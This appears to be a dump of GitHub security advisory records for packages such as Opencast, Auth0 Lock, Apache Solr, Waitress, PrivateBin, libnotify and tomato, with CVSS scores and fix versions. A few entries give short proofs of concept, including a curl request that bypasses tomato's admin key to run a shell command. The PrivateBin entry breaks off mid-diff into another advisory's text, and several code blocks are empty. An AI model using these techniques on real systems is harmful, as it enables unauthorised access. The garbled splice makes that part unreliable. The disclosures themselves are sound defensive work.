+The security configuration in `etc/security/mh_default_org.xml` enables a remember-me cookie based on a hash created from the [username, password, and an additional system key](https://docs.spring.io/spring-security/site/docs/3.0.x/reference/remember-me.html). Opencast has hard-coded this system key in the large XML file and never mentions to change this, basically ensuring that all systems use the same key:
+
+```xml
+
+```
+
+This means that an attacker getting access to a remember-me token for one server can get access to all servers which allow log-in using the same credentials without ever needing the credentials. For example, a remember-me token obtained from develop.opencast.org can be used on stable.opencast.org without actually knowing the log-in credentials.
+
+Such an attack will usually not work on different installations – assuming that safe, unique passwords are used – but it is basically guaranteed to work to get access to all machines of one cluster if a token from one machine is compromised.
+
+### Patches
+
+This problem is fixed in Opencast 7.6 and Opencast 8.1
+
+### Workarounds
+
+We strongly recommend updating to the patched version. Still, as a workaround for older versions, in `etc/security/mh_default_org.xml`, set a custom key for each server:
+
+```xml
+
+```
+
+### References
+
+- [Relevant lines in the security configuration](https://github.com/opencast/opencast/blob/161ee619382f144dc35eea211fc6b556025b98e1/etc/security/mh_default_org.xml#L335-L336)
+- [Spring Security Remember-Me Authentication Documentation](https://docs.spring.io/spring-security/site/docs/3.0.x/reference/remember-me.html#remember-me-hash-token)
+
+### For more information
+If you have any questions or comments about this advisory:
+- Open an issue in [opencast/opencast](https://github.com/opencast/opencast/issues)
+- For security-relevant information, email us at [security@opencast.org](mailto:security@opencast.org)
+
+### Thanks
+Thanks to @LukasKalbertodt for reporting the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0'}, {'fixed': '8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-mh8g-hprg-8363'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5222'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/1a7172c95af8d542a77ae5b153e4c834dd4788a6'}]","{'cwe_ids': ['CWE-798'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-01-30T20:48:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w2pf-g6r8-pg22,2023-09-11T18:14:11Z,2020-01-31T17:59:51Z,,['CVE-2019-20174'],auth0-lock vulnerable to XSS via unsanitized placeholder property,"## Overview
+
+Auth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages.
+
+## Am I affected?
+
+You are affected by this vulnerability if all of the following conditions apply:
+
+- You are using Auth0 Lock version 11.20.4 or earlier.
+- You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source.
+
+An example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter:
+
+```javascript
+
+```
+
+## How to fix that?
+
+Developers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes:
+
+1. The existing `placeholder` property is now treated as plain text to mitigate the problem.
+2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources.
+
+## Will this update impact my users?
+
+This fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions.
+
+Developers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'auth0-lock'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.21.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/lock/security/advisories/GHSA-w2pf-g6r8-pg22'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20174'}, {'type': 'WEB', 'url': 'https://github.com/auth0/lock/commit/6c15e5659c21cd814ea119af5c51b61399598dd5'}, {'type': 'WEB', 'url': 'https://auth0.com/docs/security/bulletins/cve-2019-20174'}, {'type': 'WEB', 'url': 'https://github.com/auth0/lock/releases/tag/v11.21.0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-01-31T00:31:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2289-pqfq-6wx7,2021-08-19T16:48:04Z,2020-01-28T22:26:54Z,,['CVE-2019-12409'],Unrestricted upload of file with dangerous type in Apache Solr,"The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.1'}, {'fixed': '8.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12409'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-review/pull/12462'}, {'type': 'WEB', 'url': 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-12409-RCE%20Vulnerability%20Due%20to%20Bad%20Defalut%20Config-Apache%20Solr'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SOLR-13647'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/47e112035b4aa67ece3b75dbcd1b9c9212895b9dfe2a71f6f7c174e2@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/6640c7e370fce2b74e466a605a46244ccc40666ad9e3064a4e04a85d@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/925cdb49ceae78baddb45da7beb9b4d2b1ddc4a8e318c65e91fb4e87@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/a044eae4f6f5b0160ece5bf9cc4c0dad90ce7dd9bb210a9dc50b54be@%3Cgeneral.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ce7c0b456b15f6c7518adefa54ec948fed6de8e951a2584500c1e541@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://support.f5.com/csp/article/K23720587?utm_source=f5support&utm_medium=RSS'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-01-28T22:25:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8vp7-j5cj-vvm2,2021-01-08T20:32:44Z,2020-01-31T18:00:43Z,,['CVE-2020-5220'],Ability to expose data in Sylius by using an unintended serialisation group,"### Impact
+
+ResourceBundle accepts and uses any serialisation groups to be passed via a HTTP header. This might lead to data exposure by using an unintended serialisation group - for example it could make Shop API use a more permissive group from Admin API.
+
+Anyone exposing an API with ResourceBundle's controller is affected. The vulnerable versions are: `<1.3 || >=1.3.0 <=1.3.12 || >=1.4.0 <=1.4.5 || >=1.5.0 <=1.5.0 || >=1.6.0 <=1.6.2`.
+
+### Patches
+
+The patch is provided for ResourceBundle 1.3.13, 1.4.6, 1.5.1 and 1.6.3, but not for any versions below 1.3.
+
+After it is applied, It allows to choose only the groups that are defined in `serialization_groups` or `allowed_serialization_groups` route definition. Any group not defined in those will not be used.
+
+This behaviour might be a BC break for those using custom groups via the HTTP header, please adjust `allowed_serialization_groups` accordingly.
+
+### Workarounds
+
+Service `sylius.resource_controller.request_configuration_factory` can be overridden with an implementation copied from `\Sylius\Bundle\ResourceBundle\Controller\RequestConfigurationFactory` where the part that handles custom serialisation groups is deleted.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/resource-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/SyliusResourceBundle/security/advisories/GHSA-8vp7-j5cj-vvm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5220'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-5220.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/sylius/CVE-2020-5220.yaml'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-01-27T20:11:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-968f-66r5-5v74,2021-01-08T20:34:26Z,2020-01-06T18:44:21Z,,['CVE-2019-16789'],HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers (Follow-up),"### Impact
+
+The patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and still would allow an attacker to smuggle requests/split a HTTP request with invalid data.
+
+This updates the existing CVE with ID: CVE-2019-16789
+
+### Patches
+
+Waitress version 1.4.2 has been updated to now validate HTTP headers better to avoid the issue, completely fixing all known issues with whitespace.
+
+### Workarounds
+
+There are no work-arounds, upgrading to Waitress 1.4.2 is highly recommended.
+
+### References
+
+See https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related)
+* email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'waitress'}, 'ecosystem_specific': {'affected_functions': ['waitress.parser.HTTPRequestParser.parse_header']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16789'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-review/pull/14604'}, {'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/commit/ddb65b489d01d696afa1695b75fdd5df3e4ffdf8'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0720'}, {'type': 'WEB', 'url': 'https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-01-06T18:43:11Z', 'nvd_published_at': '2019-12-26T17:15:00Z'}"
+1.4.0,GHSA-h362-m8f2-5x7c,2021-01-08T20:31:50Z,2020-01-30T21:21:58Z,,['CVE-2020-5229'],Password Hashing: Do not use MD5,"### Impact
+
+User passwords are stored in the database using the rather outdated and cryptographically insecure MD5 hash algorithm. Furthermore, the hashes are salted using the username instead of a random salt, causing hashes for users with the same username and password to collide which is problematic especially for popular users like the default `admin` user.
+
+This essentially means that for an attacker, it might be feasible to reconstruct a user's password given access to these hashes.
+
+Note that attackers needing access to the hashes means that they must gain access to the database in which these are stored first to be able to start cracking the passwords.
+
+
+### Patches
+
+The problem is addressed in Opencast 8.1 which now uses the modern and much stronger bcrypt password hashing algorithm for storing passwords. Note, that old hashes remain MD5 until the password is updated.
+
+For a list of users whose password hashes are stored using MD5, take a look at the `/user-utils/users/md5.json` REST endpoint.
+
+
+### Workarounds
+
+There is no workaround.
+
+### References
+
+- [MD5 (Wikipedia)](https://en.wikipedia.org/wiki/MD5)
+- [bcrypt (Wikipedia)](https://en.wikipedia.org/wiki/Bcrypt)
+- [How weak is MD5 as a password hashing function?](https://security.stackexchange.com/q/52461)
+
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+- Open an issue in [opencast/opencast](https://github.com/opencast/opencast/issues)
+- For security-relevant information, email us at security@opencast.org","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common-jpa-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opencastproject:opencast-common-jpa-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0'}, {'fixed': '8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencast/opencast/security/advisories/GHSA-h362-m8f2-5x7c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5229'}, {'type': 'WEB', 'url': 'https://github.com/opencast/opencast/commit/32bfbe5f78e214e2d589f92050228b91d704758e'}]","{'cwe_ids': ['CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-01-30T19:59:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8j72-p2wm-6738,2021-01-14T17:43:40Z,2020-01-14T20:19:33Z,,['CVE-2020-5223'],Persistent XSS vulnerability in filename of attached file in PrivateBin,"On 24th of December 2019 one of the [property based unit tests](https://github.com/PrivateBin/PrivateBin/blob/master/tst/README.md#property-based-unit-testing) reported a [failure](https://travis-ci.org/PrivateBin/PrivateBin/jobs/629180605#L782). Upon investigation, [@elrido](https://github.com/elrido) discovered that the failure was due to unescaped HTML, which allowed the user provided attachment file name to inject HTML under certain conditions leading to a persistent [Cross-site scripting (XSS)](https://en.wikipedia.org/wiki/Cross-site_scripting) vulnerability. After committing an [initial fix](https://github.com/PrivateBin/PrivateBin/commit/8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6) to the master branch, the [issue was reported](https://github.com/PrivateBin/PrivateBin/issues/554) on 25th of December. Vulnerability write-up done by [@rugk](https://github.com/rugk) and [@elrido](https://github.com/elrido).
+The vulnerability has been fixed in [PrivateBin v1.3.2 & v1.2.2](https://privatebin.info/news/v1.3.2-v1.2.2-release.html). Admins are urged to upgrade to these versions to protect the affected users.
+
+## Affected versions
+
+Any PrivateBin version since 1.2.
+
+## Conditions
+
+* The configuration setting `fileupload` has to be enabled, as 1.3 displays an error when trying to open a paste with attachment.
+* The CSP header rules don't get applied. For example:
+ * They are unsupported or disabled in the visitors browser.
+ * They are filtered out by a some proxy server at the server or client side.
+ * The header is disabled/commented in the PHP-logic.
+ * The rules have been relaxed in the `cspheader` configuration setting.
+* A paste with a malicious filename is created.
+* A visitor of that paste clicks on the ""Clone"" button.
+
+## Proof of concept
+
+The following method is just one possibility to exploit this issue and is provided as a proof of concept with steps to reproduce the issue. To avoid having to create an actual file with a rogue filename, one could use the [Python CLI client for PrivateBin](https://github.com/r4sas/PBinCLI/) and [edit line 56 in `format.py`](https://github.com/r4sas/PBinCLI/blob/682b47fbd3e24a8a53c3b484ba896a5dbc85cda2/pbincli/format.py#L56) as follows:
+
+```diff
+- self._attachment_name = path_leaf(path)
++ self._attachment_name = '""
+Cannot /
+```
+
+## Recommendation
+
+Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.",[],"[{'package': {'ecosystem': 'npm', 'name': 'connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-7370'}, {'type': 'WEB', 'url': 'https://github.com/senchalabs/connect/issues/831'}, {'type': 'WEB', 'url': 'https://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a'}, {'type': 'WEB', 'url': 'https://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2013-7370'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7370'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-7370'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2013-7370'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/04/21/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/05/13/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:07:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6898-wx94-8jq8,2023-09-08T20:38:35Z,2020-08-31T22:50:48Z,,['CVE-2013-7381'],Potential Command Injection in libnotify,"Versions 1.0.3 and earlier of libnotify are affected by a shell command injection vulnerability. This may result in execution of arbitrary shell commands, if user input is passed into libnotify.notify.
+
+Untrusted input passed in the call to libnotify.notify could result in execution of shell commands. Callers may be unaware of this.
+
+### Example
+```js
+var libnotify = require('libnotify')
+libnotify.notify('UNTRUSTED INPUT', { title: \""\"" }, function () {
+ console.log(arguments);
+})
+```
+
+Special thanks to Neal Poole for submitting the pull request to fix this issue.
+
+
+## Recommendation
+
+Update to version 1.0.4 or greater","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'libnotify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-7381'}, {'type': 'WEB', 'url': 'https://github.com/mytrile/node-libnotify/commit/dfe7801d73a0dda10663a0ff3d0ec8b4d5f0d448'}, {'type': 'PACKAGE', 'url': 'https://github.com/mytrile/node-libnotify'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/20'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/05/13/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/05/15/2'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:08:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9vxc-g2jx-qj3p,2021-09-23T21:00:28Z,2020-08-31T22:59:07Z,,['CVE-2013-7379'],API Admin Auth Weakness in tomato,"Versions of `tomato` prior to 0.0.6 are affected by a somewhat complex authentication bypass vulnerability in the admin service when only a single access key is configured on the server. The vulnerability allows an attacker to guess the password for the admin service, no matter how complex that password is, in less than 200 requests.
+
+
+## Details
+The tomato API has an admin service that is enabled by setting up an `access_key` in the config options. This `access_key` is intended to protect the API admin from unauthorized access.
+
+
+Tomato verifies the `access_key` by checking to see if the server `access_key` incorporates the user provided value at any location. This allows an attacker to provide a single character as an `access_key`, and so long as the server key contains at least one instance of that character it will be considered a valid key.
+
+## Proof of Concept
+This is the snippet of code that does the comparison to authorize requests.
+
+```
+if (access_key && config.master.api.access_key.indexOf(access_key) !== -1) {
+```
+
+For an access_key that is set to anything that includes the letter 'a' the following request would be authorized.
+
+```
+$ curl -X POST ""http://localhost:8081/api/exec"" -H ""Content-Type: application/json"" -d @test -H ""access-key: a""
+{
+ ""cmd"": ""ls"",
+ ""path"": ""."",
+ ""stdout"": ""app.js\nconfig.js\nlog\nnode_modules\nserver.js\n"",
+ ""stderr"": """"
+}
+```
+
+
+
+## Recommendation
+
+Update to version 0.0.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'tomato'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-7379'}, {'type': 'WEB', 'url': 'https://github.com/leizongmin/tomato/commit/9e427d524e04a905312a3294c85e939ed7d57b8c'}, {'type': 'PACKAGE', 'url': 'https://github.com/leizongmin/tomato'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/38'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/05/13/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/05/15/2'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:08:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f9vc-q3hh-qhfv,2020-08-31T18:08:29Z,2020-08-31T22:56:00Z,,['CVE-2014-10065'],Content Injection in remarkable,"Versions 1.4.0 and earlier of `remarkable` are affected by a cross-site scripting vulnerability. This occurs because vulnerable versions of `remarkable` did not properly whitelist link protocols, and consequently allowed `javascript:` to be used.
+
+
+### Proof of Concept
+
+Markdown Source:
+```
+[link]()
+```
+
+Rendered HTML:
+```
+link
+```
+
+
+## Recommendation
+
+Update to version 1.4.1 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'remarkable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-10065'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/remarkable/issues/97'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/remarkable/commit/d54ed887f4997221cd7cb9790e953a83c504de36'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/30'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:08:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9m4x-8w29-r78g,2023-09-13T19:18:38Z,2020-08-13T18:54:19Z,,['CVE-2020-8205'],Server-Side Request Forgery in @uppy/companion,"The @uppy/companion npm package before versions 1.13.2 and 2.0.0-alpha.5 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@uppy/companion'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@uppy/companion'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.0'}, {'fixed': '2.0.0-alpha.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0-alpha.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8205'}, {'type': 'WEB', 'url': 'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/891270'}, {'type': 'WEB', 'url': 'https://github.com/transloadit/uppy/blob/master/CHANGELOG.md#1161'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-13T18:54:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-673x-f5wx-fxpw,2021-01-07T23:39:00Z,2020-08-28T21:45:15Z,,['CVE-2020-15159'],Cross Site Scripting and RCE in baserCMS,"baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE).
+
+* Impact: XSS to RCE via Arbitrary file upload.
+* Attack vector is: Administrator must be logged in.
+* Components are: ThemeFilesController.php, UploaderFilesController.php.
+* Tested baserCMS Version : 4.3.6 (Latest)
+* Affected baserCMS Version : 4.2.0 ~ 4.3.6 (XSS), 3.0.10 ~ 4.3.6 (RCE)
+* Patches : https://basercms.net/security/20200827
+
+Found by Vulnerability Research team in [Flatt Security Inc.](https://flatt.tech/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.3.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15159'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d'}, {'type': 'WEB', 'url': 'https://basercms.net/security/20200827'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-28T21:44:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x4rf-4mqf-cm8w,2020-08-19T22:44:23Z,2020-08-19T22:44:22Z,2020-08-19T22:44:22Z,[],Open Redirect in ecstatic,Withdrawn: Duplicate of GHSA-9q64-mpxx-87fg,[],"[{'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ecstatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jfhbrook/node-ecstatic/issues/259'}, {'type': 'WEB', 'url': 'https://github.com/jfhbrook/node-ecstatic/commit/be6fc25a826f190b67f4d16158f9d67899e38ee4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/830/versions'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T21:09:41Z', 'nvd_published_at': None}"
